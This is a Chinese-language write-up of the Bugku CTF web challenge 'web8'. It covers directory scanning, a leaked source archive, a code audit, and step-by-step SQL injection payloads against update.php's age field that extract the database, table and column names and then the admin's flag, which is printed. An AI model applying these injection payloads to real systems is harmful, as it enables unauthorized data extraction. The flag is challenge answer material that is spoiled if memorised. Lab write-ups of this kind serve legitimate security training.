CTF – BUGKU – web8

题目说明

题目来源: new.bugku.com

题目直达: http://123.206.31.85:10008

解题步骤

寻找突破

打开后看到登录框

注册一个用户登录

没有什么有用的信息
使用dirsearch扫描

发现/.idea/workspace.xml文件和www.tar.gz源码泄露

代码审计

login.php和register.php使用PDO预处理执行SQL语句防止SQL注入

但是update.php中age没有进行任何防护

SQL注入

获取数据库名

Payload: (select database())

数据库名:web8

获取数据表名

Payload:
(select group_concat(table_name) from information_schema.tables where table_schema = 0x77656238)

数据表名:users

获取字段名

Payload:
(select group_concat(column_name) from information_schema.columns where table_schema = 0x77656238 and table_name = 0x7573657273)

字段名:id,username,password,nickname,age,description

获取flag

Payload:
(select description from (select * from users where username like 0x61646D696E)a)

flag{00e33ada703317e0e2346c51e15598ed}

也可以逐位爆破
要注意csrf-token的处理